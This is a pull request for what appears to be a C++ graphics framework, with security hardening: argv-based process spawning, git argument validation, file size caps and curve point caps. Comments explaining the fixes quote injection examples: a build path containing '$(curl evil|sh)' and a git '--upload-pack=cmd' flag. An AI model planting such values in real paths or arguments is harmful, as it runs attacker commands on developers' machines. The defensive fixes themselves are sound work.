### PR TITLE
Merge dev: security fixes, Android improvements, curve & addon updates

### DIFF
--- a/addons/tcxTls/src/tcTlsClient.cpp
+++ b/addons/tcxTls/src/tcTlsClient.cpp
@@ -35,6 +35,14 @@ extern const char* bundledCaPem();
 extern const char* bundledCaBundleDate();
 } // namespace tls_internal
 
+// Upper bound on CA PEM file size. Real-world OS trust stores are well
+// under 1 MB (typically ~250 KB; the embedded Mozilla bundle is ~360 KB).
+// 16 MB is generous and guards against runaway reads if the path is
+// unexpectedly large — e.g. a sysadmin symlinked /etc/ssl/cert.pem to
+// the wrong target, or someone passed a non-PEM file to
+// setCACertificateFile() by mistake.
+inline constexpr std::streamsize kMaxCaPemBytes = 16 * 1024 * 1024;
+
 namespace {
 size_t countCerts(const mbedtls_x509_crt* chain) {
     size_t n = 0;
@@ -156,11 +164,25 @@ bool TlsClient::setCACertificate(const std::string& pemData) {
 }
 
 bool TlsClient::setCACertificateFile(const std::string& path) {
-    std::ifstream file(path);
+    // Open at end (ate) to get size via tellg without a separate stat()
+    // call — works portably on POSIX and Windows.
+    std::ifstream file(path, std::ios::binary | std::ios::ate);
     if (!file) {
         tcLogError() << "TlsClient: Failed to open CA certificate file: " << path;
         return false;
     }
+    std::streamsize size = file.tellg();
+    if (size < 0) {
+        tcLogError() << "TlsClient: Failed to size CA certificate file: " << path;
+        return false;
+    }
+    if (size > kMaxCaPemBytes) {
+        tcLogError() << "TlsClient: CA certificate file too large ("
+                     << size << " bytes, limit " << kMaxCaPemBytes
+                     << "): " << path;
+        return false;
+    }
+    file.seekg(0);
 
     std::stringstream buffer;
     buffer << file.rdbuf();
@@ -215,6 +237,12 @@ void TlsClient::ensureDefaultCAsLoaded() {
     for (const char** p = kPaths; *p != nullptr; ++p) {
         struct stat st;
         if (stat(*p, &st) != 0) continue;
+        if (st.st_size > kMaxCaPemBytes) {
+            tcLogWarning() << "TlsClient: skipping " << *p
+                           << " (size " << st.st_size
+                           << " > limit " << kMaxCaPemBytes << ")";
+            continue;
+        }
         std::ifstream f(*p);
         if (!f) continue;
         std::stringstream buf;

--- a/core/include/tc/app/tcHotReloadHost.h
+++ b/core/include/tc/app/tcHotReloadHost.h
@@ -16,8 +16,13 @@
 // Note: this header is included BY TrussC.h (after all core types are defined).
 #ifdef _WIN32
 #include <windows.h>
+#include <process.h>
 #else
 #include <dlfcn.h>
+#include <spawn.h>
+#include <sys/wait.h>
+#include <cstring>
+extern char** environ;
 #endif
 #include <filesystem>
 #include <chrono>
@@ -209,6 +214,48 @@ inline string findCMake() {
 }
 
 // ---------------------------------------------------------------------------
+// Spawn a process with explicit argv (no shell). Equivalent in spirit to
+// trusscli's runProcess(). We bypass std::system because the build dir is
+// derived from fs::canonical(getExecutablePath()) — outside the developer's
+// direct control once the binary is built and distributed — and may contain
+// shell metacharacters that would be expanded by /bin/sh -c "...".
+// Specifically, $(cmd) and `cmd` are evaluated even inside double quotes,
+// so a path like ~/projects/demo$(curl evil|sh)/ would execute the embedded
+// command on every rebuild. Passing argv directly to posix_spawnp /
+// _spawnvp removes the shell from the loop entirely; any metacharacters
+// become literal argument bytes to cmake.
+// ---------------------------------------------------------------------------
+inline int runBuildCommand(const vector<string>& argv) {
+    if (argv.empty()) return -1;
+
+#ifdef _WIN32
+    vector<const char*> cargv;
+    cargv.reserve(argv.size() + 1);
+    for (const auto& a : argv) cargv.push_back(a.c_str());
+    cargv.push_back(nullptr);
+    return (int)_spawnvp(_P_WAIT, cargv[0], cargv.data());
+#else
+    vector<char*> cargv;
+    cargv.reserve(argv.size() + 1);
+    for (const auto& a : argv) cargv.push_back(const_cast<char*>(a.c_str()));
+    cargv.push_back(nullptr);
+    pid_t pid;
+    int err = posix_spawnp(&pid, cargv[0], nullptr, nullptr,
+                            cargv.data(), environ);
+    if (err != 0) {
+        std::cerr << "[HotReload] failed to spawn '" << argv[0]
+                  << "': " << std::strerror(err) << "\n";
+        return -1;
+    }
+    int status = 0;
+    waitpid(pid, &status, 0);
+    if (WIFEXITED(status))   return WEXITSTATUS(status);
+    if (WIFSIGNALED(status)) return 128 + WTERMSIG(status);
+    return -1;
+#endif
+}
+
+// ---------------------------------------------------------------------------
 // Hot reload host — manages the Guest lifecycle
 // ---------------------------------------------------------------------------
 
@@ -317,9 +364,11 @@ struct Host {
         string cmake = findCMake();
         logNotice("HotReload") << "Rebuilding guest...";
 
-        // Only rebuild the guest target — fast incremental build
-        string cmd = cmake + " --build \"" + buildDir + "\" --target guest --parallel";
-        int rc = std::system(cmd.c_str());
+        // Only rebuild the guest target — fast incremental build.
+        // argv is passed directly to posix_spawnp / _spawnvp — no shell
+        // is involved, so $(...), ``, ; etc. in buildDir cannot run.
+        int rc = runBuildCommand({cmake, "--build", buildDir,
+                                  "--target", "guest", "--parallel"});
         if (rc != 0) {
             logError() << "[HotReload] Build failed (exit code " << rc << ")";
             return false;

--- a/core/include/tc/graphics/tcCurveTessellation.h
+++ b/core/include/tc/graphics/tcCurveTessellation.h
@@ -17,6 +17,7 @@
 // =============================================================================
 
 #include "tcMath.h"   // TAU, HALF_TAU
+#include "../utils/tcLog.h"
 #include <algorithm>
 #include <cmath>
 
@@ -79,6 +80,26 @@ inline int segmentsForArc(float radius, float angleSpan, float tolerance) {
 // =============================================================================
 
 inline constexpr int kBezierMaxDepth = 16;
+
+// Hard cap on the order (point count) accepted by the N-th order Bezier
+// tessellator. Each split inside subdivideBezierN does an O(N^2) in-place
+// de Casteljau reduction (level k touches N-k pairs of points, summing
+// to N*(N-1)/2 lerps per node). Multiplied by the binary recursion tree
+// — capped at depth 16, so up to ~2^16 leaves on pathological control
+// polygons — total work grows as O(N^2 * 2^depth). Empirically a closed
+// loop at N=2000 takes ~80 seconds on a single core, frozen-tab territory.
+//
+// In practice N>=5 Bezier curves are vanishingly rare: SVG, fonts, and
+// every desktop vector tool chain cubic segments together rather than
+// raise the order. N=64 is well above any legitimate use we've seen and
+// keeps the worst case in the low-hundreds-of-ms range.
+//
+// If you genuinely need higher-order Bezier (N>10 or so), the bundled
+// implementation is intentionally naive — at that point you want a
+// purpose-built tessellator with cached factorials / vectorised inner
+// loops / GPU dispatch. Roll your own and call the underlying primitives
+// from there, or chain cubics.
+inline constexpr int kBezierMaxOrder = 64;
 
 namespace detail {
 
@@ -214,6 +235,14 @@ void tessellateBezierN(const std::vector<Vec3>& pts, float tolerance, Out& out) 
     if (pts.empty()) return;
     out.push_back(pts.front());
     if (pts.size() < 2) return;
+    if ((int)pts.size() > kBezierMaxOrder) {
+        // Refuse rather than freeze. See kBezierMaxOrder for the rationale.
+        logWarning() << "tessellateBezierN: refusing N=" << pts.size()
+                     << " control points (cap " << kBezierMaxOrder
+                     << "). Chain cubics for legitimate curves, or write a"
+                     << " purpose-built high-order tessellator.";
+        return;
+    }
     if (tolerance <= 0.0f) tolerance = 0.1f;
     detail::subdivideBezierN(pts, tolerance * tolerance, 0, out);
 }

--- a/core/include/tc/graphics/tcShape.h
+++ b/core/include/tc/graphics/tcShape.h
@@ -245,11 +245,28 @@ inline void appendCatmullRomSegment_(const Vec3& p0, const Vec3& p1,
 }
 } // namespace internal
 
+// Hard cap on the number of points accepted by appendCurve. Catmull-Rom
+// chains expand each segment into a cubic Bezier and tessellate it
+// adaptively (up to ~131k recursive nodes at the depth cap, ~1-100ms per
+// segment depending on geometry). N segments → linear DoS surface; at
+// N=1e6 a single appendCurve call could spend hours of CPU.
+//
+// 100k is generous — a hand-drawn pen-tool path tops out in the low
+// thousands. If you really need more, your art tool is doing something
+// the framework wasn't designed for; split into multiple appendCurve
+// calls, or batch-tessellate yourself.
+inline constexpr int kAppendCurveMaxPoints = 100000;
+
 // Append a chained Catmull-Rom curve through `points`. Emits (N-3)
 // segments; needs N >= 4. Tangent points (first and last) are NOT
 // pushed as vertices — only the visible interior is appended.
 inline void appendCurve(const std::vector<Vec3>& points) {
     if (points.size() < 4) return;
+    if ((int)points.size() > kAppendCurveMaxPoints) {
+        logWarning() << "appendCurve: refusing N=" << points.size()
+                     << " points (cap " << kAppendCurveMaxPoints << ").";
+        return;
+    }
     for (size_t i = 0; i + 3 < points.size(); i++) {
         internal::appendCatmullRomSegment_(points[i], points[i+1],
                                            points[i+2], points[i+3]);
@@ -262,6 +279,11 @@ inline void appendCurve(const std::vector<Vec3>& points, bool closed) {
     if (!closed) { appendCurve(points); return; }
     const int n = (int)points.size();
     if (n < 3) return;
+    if (n > kAppendCurveMaxPoints) {
+        logWarning() << "appendCurve (closed): refusing N=" << n
+                     << " points (cap " << kAppendCurveMaxPoints << ").";
+        return;
+    }
     for (int i = 0; i < n; i++) {
         internal::appendCatmullRomSegment_(points[(i - 1 + n) % n],
                                            points[i],

--- a/tools/src/main.cpp
+++ b/tools/src/main.cpp
@@ -1856,16 +1856,39 @@ static string promptString(const string& msg) {
     return line;
 }
 
+// Reject strings git would parse as an option. URLs, refs, branch
+// names, etc. legitimately never start with '-'. A registry entry
+// or addon.json dependency claiming url="--upload-pack=..." would
+// otherwise be passed to git verbatim and run as a flag.
+static bool isSafeGitArg(const string& s) {
+    return !s.empty() && s.front() != '-';
+}
+
 // Run git clone with optional ref pinning.
-//   refKind=branch/tag → `git clone -b <ref> ...`
-//   refKind=commit     → clone, then `git checkout <ref>`
+//   refKind=branch/tag → `git clone -b <ref> -- <url> <dir>`
+//   refKind=commit     → clone, then `git checkout <ref>`  (ref validated)
 //   refKind=""         → plain clone (default branch)
+//
+// All forms use `--` to terminate options before the positional URL so
+// that a registry-supplied URL starting with '-' cannot be smuggled in
+// as a git flag (e.g., --upload-pack=cmd → arbitrary command exec).
+// Refs are validated up front since `git checkout` interprets `--` as
+// a pathspec separator, not an end-of-options marker, so we cannot use
+// the same trick there.
 static int gitCloneWithRef(const string& url, const string& ref,
                             const string& refKind, const string& targetDir) {
-    if ((refKind == "branch" || refKind == "tag") && !ref.empty()) {
-        return runProcess({"git", "clone", "-b", ref, url, targetDir});
+    if (!isSafeGitArg(url)) {
+        cerr << "Error: refusing git clone with unsafe URL: " << url << "\n";
+        return 1;
     }
-    int rc = runProcess({"git", "clone", url, targetDir});
+    if (!ref.empty() && !isSafeGitArg(ref)) {
+        cerr << "Error: refusing git operation with unsafe ref: " << ref << "\n";
+        return 1;
+    }
+    if ((refKind == "branch" || refKind == "tag") && !ref.empty()) {
+        return runProcess({"git", "clone", "-b", ref, "--", url, targetDir});
+    }
+    int rc = runProcess({"git", "clone", "--", url, targetDir});
     if (rc != 0) return rc;
     if (refKind == "commit" && !ref.empty()) {
         return runProcess({"git", "-C", targetDir, "checkout", ref});
@@ -2047,8 +2070,13 @@ static int cmdAddonClone(const vector<string>& args) {
                 cout << "  (already exists) " << repo << "\n";
                 processed.insert(repo);
             } else {
+                if (!isSafeGitArg(query)) {
+                    cerr << "Error: refusing git clone with unsafe URL: " << query << "\n";
+                    failures++;
+                    continue;
+                }
                 cout << "Cloning " << query << " ...\n";
-                int rc = runProcess({"git", "clone", query, targetDir});
+                int rc = runProcess({"git", "clone", "--", query, targetDir});
                 if (rc != 0) {
                     cerr << "Error: git clone failed for " << query << "\n";
                     failures++;
@@ -2124,8 +2152,13 @@ static int cmdAddonClone(const vector<string>& args) {
             cout << "  (already exists) " << targetName << " → " << targetDir << "\n";
             processed.insert(targetName);
         } else {
+            if (!isSafeGitArg(cloneUrl)) {
+                cerr << "Error: refusing git clone with unsafe URL: " << cloneUrl << "\n";
+                failures++;
+                continue;
+            }
             cout << "Cloning " << (picked ? displayName(*picked) : cloneUrl) << " ...\n";
-            int rc = runProcess({"git", "clone", cloneUrl, targetDir});
+            int rc = runProcess({"git", "clone", "--", cloneUrl, targetDir});
             if (rc != 0) {
                 cerr << "Error: git clone failed for " << targetName << "\n";
                 failures++;


### PR DESCRIPTION
## Summary
- Security hardening
  - hotreload: drop std::system() in favor of argv spawn
  - tcxTls: cap CA PEM file size at 16 MB
  - trusscli: block git arg injection in addon clone
  - graphics: cap N on N-th order Bezier / Catmull-Rom chain (CPU DoS)
- Android: compile/bundle Java sources into APK, configurable manifest hasCode via TC_APP_HAS_CODE
- trusscli: show GitHub stars in addon list / search
- Path::drawStroke() for thick-line rendering
- Build fixes: macOS ld duplicate-libraries warning, WebGPU shadow sample_count=1, MSVC 2026 tcxObj constexpr
- Docs: AI assistant guide refresh, curve API additions, drawArc fill/stroke clarification

## Test plan
- [x] Local build / run verified on macOS
- [x] CI green